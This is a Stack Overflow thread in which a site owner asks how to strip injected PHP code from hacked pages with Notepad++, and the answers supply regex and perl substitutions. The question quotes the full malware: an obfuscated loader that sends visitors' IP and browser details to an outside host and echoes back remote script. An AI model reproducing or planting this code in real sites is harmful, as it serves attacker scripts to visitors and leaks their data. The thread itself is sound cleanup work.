# Notepad++ erase anything in between.. without REGEX?

Tags: notepad++, wildcard

All of my websites on GoDaddy were hacked yesterday and had this code inserted in EVERY single PHP page. :-(

```
<?php
#6278d7#
error_reporting(0); @ini_set('display_errors',0); $wp_krzr3 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_krzr3) && !preg_match ('/bot/i', $wp_krzr3))){
$wp_krzr093="http://"."html"."common".".com/"."common"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_krzr3);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_krzr093); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_3krzr = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_3krzr = @file_get_contents($wp_krzr093);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_3krzr=@stream_get_contents(@fopen($wp_krzr093, "r"));}}
if (substr($wp_3krzr,1,3) === 'scr'){ echo $wp_3krzr; }
#/6278d7#
?>
```

I want to delete everything in between the first and last # character and replace with nothing, nullifying this code.

I have tried using folder search and replace with this:

```
#.*#.*#.*#
```

and this

```
<?php.*#.*#.*#.*#.*?>
```

..because the .* means "anything in between", right?  (There are some box characters that show up after the opening php statement when I copy into the search field that I assume are line breaks)

Im so confused.  Any help?  Stack Overflow is a great resource BTW, thank you!

Comment: Just a silly (but necessary) question: don't you have a back up? Not even one provided by the hosting company?

Comment: I DO Max, but its 2 weeks old.  And GoDaddy has one but I had difficulty using their system.  My next SO question will be how this happened in the first place..

Comment: Are the strings #6278d7# and #/6278d7# alway present in your pages? They seems to be some sort of opening/closing tags...

Comment: The actual string in between the hashtags is different on every page but yes its there.  For example, the next hacked page uses #3a4bc0#, etc.  The main issue seems to be the wildcard combo .* in notepad++ just isnt working, even on html code.  I agree they are some sort of open/close.

Comment: There isn't a way to do wildcard searches in Notepad++ without using RegEx.

Comment: I found some pages online that say otherwise.  I assume REGEX will be the only route.  I'll do some more research, and if this is the case this will be marked as the answer, thanks!

Answer (score 0, accepted):

With an assumption.
1. The hex numbers bookending the code are always 6 chars long

With RegEx in Notepad++.  You should search for this:
`(#[0-f]{6}#)(.*)(#/[0-f]{6}#)`
and replace with `##` Making sure the option to ". matches newline" is checked.

Comment: This worked.  You are correct on two counts (1. When I clicked on Regular Expression and tried the ".*", it worked as the wildcard on a single line, so RegEx is the only way to do wildcards in N++.  (2. The RegEx expression you provided worked.  I can see a day when this will help me do other things, thanks a lot man!

Comment: No problem.  I should point out that all the parentheses in the RegEx expression are unecessary (I originally misread your question, and thought that you wanted to preserve the hex strings).  RegEx is great for these kind of things, and much, much more. It's a useful trick to have up your sleeve. Max's answer is the right way to go about things, but you asked about Notepad++, so...

Answer (score 0):

Just try this regex substitution using perl

```
perl -0777 -pe 's/#([0-9a-f]{6})#.+?#\/\1#/OK/s' < test.txt
```

If you see "OK", it just works

I assumed the evil code is enclosed in some sort of opening/closing tags in HEX representation.

IMPORTANT!! Please, do a BACK UP before giving it a try!!

Comment: I dont have access to PERL but I think I recognize the RegEx there?  Looks like RegEx will be my only option.   Will look into your regex suggestion and try it, then post my findings.  thanks max

Comment: Would be that annoying to install it? I suppose you're on Windows, but there are binary distributions available for all platforms https://www.perl.org/get.html

Comment: Definitely not too annoying, lol.  However the answer provided by JRQ worked in RegEx.   (It turns out the ".*" worked on single line as the "anything in between" wildcard only in RegEx)   I want to thank you for your time, I appreciate all the help you provided!